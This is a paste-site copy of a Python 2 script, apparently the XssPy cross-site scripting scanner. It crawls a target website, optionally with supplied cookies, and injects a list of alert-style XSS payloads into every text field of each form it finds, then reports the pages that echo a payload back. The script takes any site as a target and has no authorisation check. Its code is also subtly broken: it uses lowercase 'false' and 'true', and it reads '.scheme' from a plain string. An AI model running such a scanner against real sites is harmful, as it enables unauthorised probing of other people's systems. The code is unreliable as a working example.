ulvis.paste.net

Paste Search Dynamic
Recent pastes
mechanize Browser
  1. #!/usr/bin/env python
  2. import mechanize
  3. import sys
  4. import httplib
  5. import argparse
  6. import logging
  7. from urlparse import urlparse
  8.  
  9. br = mechanize.Browser()  
  10. br.addheaders = [
  11.     ('User-agent',
  12.      'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')
  13. ]
  14. br.set_handle_robots(false)
  15. br.set_handle_refresh(false)
  16.  
  17. payloads = ['<h1>Hi</h1>','<img src="http://inexist.ent" onerror="javascript:alert(1)"/>','<svg onload="alert(/x/)">','<script>alert("Hello")</script>', '<svg "ons>', '" onfocus="alert(1);', 'javascript:alert(1)']
  18. blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg',
  19.              '.pdf']
  20. xssLinks = []          
  21.  
  22.  
  23. class color:
  24.     BLUE = '\033[94m'
  25.     RED = '\033[91m'
  26.     GREEN = '\033[92m'
  27.     YELLOW = '\033[93m'
  28.     BOLD = '\033[1m'
  29.     END = '\033[0m'
  30.  
  31.     @staticmethod
  32.     def log(lvl, col, msg):
  33.         logger.log(lvl, col + msg + color.END)
  34.  
  35.  
  36. print color.BOLD + color.RED + """
  37. Comprehensive Scan: python XssPy.py -u website.com -e
  38. Verbose logging: python XssPy.py -u website.com -v
  39. Cookies: python XssPy.py -u website.complex -c name=val name=val
  40. """ + color.END
  41.  
  42. logger = logging.getLogger(__name__)
  43. lh = logging.StreamHandler()
  44. logger.addHandler(lh)
  45. formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S')
  46. lh.setFormatter(formatter)
  47.  
  48. parser = argparse.ArgumentParser()
  49. parser.add_argument('-u', action='store', dest='url',
  50.                     help='The URL to analyze')
  51. parser.add_argument('-e', action='store_true', dest='compOn',
  52.                     help='Enable comprehensive scan')
  53. parser.add_argument('-v', action='store_true', dest='verbose',
  54.                     help='Enable verbose logging')
  55. parser.add_argument('-c', action='store', dest='cookies',
  56.                     help='Space separated list of cookies',
  57.                     nargs='+', default=[])
  58. results = parser.parse_args()
  59.  
  60. logger.setLevel(logging.DEBUG if results.verbose else logging.INFO)
  61.  
  62.  
  63. def testPayload(payload, p, link):
  64.     br.form[str(p.name)] = payload
  65.     br.submit()
  66.     # if payload is found in response, we have XSS
  67.     if payload in br.response().read():
  68.         color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!')
  69.         report = 'Link: %s, Payload: %s, Element: %s' % (str(link),
  70.                                                          payload, str(p.name))
  71.         color.log(logging.INFO, color.BOLD + color.GREEN, report)
  72.         xssLinks.append(report)
  73.     br.back()
  74.  
  75.  
  76. def initializeAndFind():
  77.  
  78.     if not results.url:  
  79.         color.log(logging.INFO, color.GREEN, 'Url not provided correctly')
  80.         return []
  81.  
  82.     firstDomains = []    
  83.     allURLS = []
  84.     allURLS.append(results.url)    
  85.     largeNumberOfUrls = []    
  86.    
  87.     for url in allURLS:
  88.         smallurl = str(url)
  89.  
  90.         try:
  91.             test = httplib.HTTPSConnection(smallurl)
  92.             test.request("GET", "/")
  93.             response = test.getresponse()
  94.             if (response.status == 200) | (response.status == 302):
  95.                 url = "https://www." + str(url)
  96.             elif response.status == 301:
  97.                 loc = response.getheader('Location')
  98.                 url = loc.scheme + '://' + loc.netloc
  99.             else:
  100.                 url = "http://www." + str(url)
  101.         except:
  102.             url = "http://www." + str(url)
  103.         try:
  104.             br.open(url)
  105.             for cookie in results.cookies:
  106.                 color.log(logging.INFO, color.BLUE,
  107.                           'Adding cookie: %s' % cookie)
  108.                 br.set_cookie(cookie)
  109.             br.open(url)
  110.             color.log(logging.INFO, color.GREEN,
  111.                       'Finding all the links of the website ' + str(url))
  112.             for link in br.links():        # finding all the links
  113.                 if smallurl in str(link.absolute_url):
  114.                     firstDomains.append(str(link.absolute_url))
  115.             firstDomains = list(set(firstDomains))
  116.         except:
  117.             pass
  118.         color.log(logging.INFO, color.GREEN,
  119.                   'Number of links to test are: ' + str(len(firstDomains)))
  120.         if results.compOn:
  121.             for link in firstDomains:
  122.                 try:
  123.                     br.open(link)
  124.              
  125.                     for newlink in br.links():
  126.                         if smallurl in str(newlink.absolute_url):
  127.                             largeNumberOfUrls.append(newlink.absolute_url)
  128.                 except:
  129.                     pass
  130.             firstDomains = list(set(firstDomains + largeNumberOfUrls))
  131.             color.log(logging.INFO, color.GREEN,
  132.                       'Total Number of links to test have become: ' +
  133.                       str(len(firstDomains)))  
  134.     return firstDomains
  135.  
  136.  
  137. def findxss(firstDomains):
  138.     color.log(logging.INFO, color.GREEN, 'Started finding XSS')
  139.     if firstDomains:  
  140.         for link in firstDomains:
  141.             blacklisted = false
  142.             y = str(link)
  143.             color.log(logging.DEBUG, color.YELLOW, str(link))
  144.             for ext in blacklist:
  145.                 if ext in y:
  146.                     color.log(logging.DEBUG, color.RED,
  147.                               '\tNot a good url to test')
  148.                     blacklisted = true
  149.                     break
  150.             if not blacklisted:
  151.                 try:
  152.                     br.open(str(link))    # open the link
  153.                     if br.forms():        # if a form exists, submit it
  154.                         params = list(br.forms())[0]    
  155.                         br.select_form(nr=0)
  156.                         for p in params.controls:
  157.                             par = str(p)
  158.                             if 'TextControl' in par:
  159.                                 color.log(logging.DEBUG, color.YELLOW,
  160.                                           '\tParam: ' + str(p.name))
  161.                                 for item in payloads:
  162.                                     testPayload(item, p, link)
  163.                 except:
  164.                     pass
  165.         color.log(logging.DEBUG, color.GREEN + color.BOLD,
  166.                   'The following links are vulnerable: ')
  167.         for link in xssLinks:        # print all xss
  168.             color.log(logging.DEBUG, color.GREEN, '\t' + link)
  169.     else:
  170.         color.log(logging.INFO, color.RED + color.BOLD,
  171.                   '\tNo link found, exiting')
  172. firstDomains = initializeAndFind()
  173. findxss(firstDomains)
Parsed in 0.061 seconds